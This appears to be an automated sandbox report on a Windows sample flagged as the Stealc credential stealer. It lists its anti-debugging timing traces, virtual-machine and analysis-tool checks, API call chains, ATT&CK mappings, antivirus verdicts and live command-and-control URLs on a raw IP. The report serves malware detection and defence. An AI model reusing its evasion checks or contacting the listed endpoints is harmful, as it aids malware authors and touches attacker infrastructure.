                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7911B3 second address: 7911C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA43130E31Bh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7911C5 second address: 7911DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA430E679F2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7911DB second address: 7911F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E324h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79559D second address: 7955A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7955A8 second address: 7955AE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79572C second address: 795748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA430E679E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA430E679EFh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795748 second address: 79574C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795C92 second address: 795C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795C96 second address: 795CAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA43130E31Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795CAD second address: 795CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679F7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795CC8 second address: 795CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796733 second address: 79673B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79673B second address: 79673F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79673F second address: 79674F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA430E679E6h 0x00000008 jne 00007FA430E679E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A402 second address: 79A41C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E320h 0x00000007 jnp 00007FA43130E316h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799ECA second address: 799EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FA430E679F2h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799EE5 second address: 799EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799EE9 second address: 799EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A07E second address: 79A0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FA43130E322h 0x0000000d jng 00007FA43130E316h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A0A0 second address: 79A0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AD90B second address: 7AD90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A21A6 second address: 7A21AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C91DD second address: 7C91E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C94A7 second address: 7C94AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C94AD second address: 7C94CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA43130E326h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C961D second address: 7C9621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9B68 second address: 7C9B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9E23 second address: 7C9E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CCA5B second address: 7CCA71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CCA71 second address: 7CCA86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CCF52 second address: 7CCF89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E323h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub edx, 09EC2623h 0x00000012 push dword ptr [ebp+122D28F2h] 0x00000018 add edx, dword ptr [ebp+122D3382h] 0x0000001e push BFB87420h 0x00000023 push eax 0x00000024 push edx 0x00000025 push esi 0x00000026 push eax 0x00000027 pop eax 0x00000028 pop esi 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE17C second address: 7CE181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE181 second address: 7CE197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE197 second address: 7CE19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CFD33 second address: 7CFD37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CFD37 second address: 7CFD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007FA430E679E6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 ja 00007FA430E679E6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C02F2 second address: 52C02FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 3972h 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C02FB second address: 52C030E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA430E679EFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C030E second address: 52C0346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov edi, 4EB39E46h 0x00000011 mov dx, 58D2h 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007FA43130E329h 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov eax, edx 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C037D second address: 52C0412 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FA430E679EFh 0x0000000c sbb al, 0000003Eh 0x0000000f jmp 00007FA430E679F9h 0x00000014 popfd 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 mov dx, B652h 0x0000001c mov esi, edi 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FA430E679EBh 0x00000027 xor cl, 0000004Eh 0x0000002a jmp 00007FA430E679F9h 0x0000002f popfd 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 jmp 00007FA430E679EDh 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FA430E679F8h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0412 second address: 52C0421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0421 second address: 52C0439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA430E679F4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F6811 second address: 6F6816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F6816 second address: 6F681C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F697D second address: 6F6981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6EBF57 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 713BD7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6F26CF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_002F38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002F4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_002EDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_002EE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_002EED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_002F4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002EDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_002EBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_002F3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002EF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002EF68A FindFirstFileA,0_2_002EF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002E16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002E1160 GetSystemInfo,ExitProcess,0_2_002E1160
                Source: file.exe, file.exe, 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2102958941.0000000001382000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWNm
                Source: file.exe, 00000000.00000002.2102958941.0000000001382000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWXg8
                Source: file.exe, 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13690
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13693
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13745
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13705
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13711
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002E45C0 VirtualProtect ?,00000004,00000100,000000000_2_002E45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002F9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F9750 mov eax, dword ptr fs:[00000030h]0_2_002F9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_002F7850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6756, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_002F9600
                Source: file.exe, file.exe, 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_002F7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_002F6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_002F7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_002F7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.2e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2061630664.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6756, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.2e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2061630664.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6756, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe53%VirustotalBrowse
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/x17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php=17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpr17%VirustotalBrowse
                http://185.215.113.37/D17%VirustotalBrowse
                http://185.215.113.37/v17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpe17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpU17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpS17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpX17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.php=file.exe, 00000000.00000002.2102958941.0000000001366000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/Dfile.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phprfile.exe, 00000000.00000002.2102958941.0000000001366000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37file.exe, 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/xfile.exe, 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phpUfile.exe, 00000000.00000002.2102958941.0000000001366000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phpefile.exe, 00000000.00000002.2102958941.0000000001366000.00000004.00000020.00020000.00000000.sdmptrueunknown
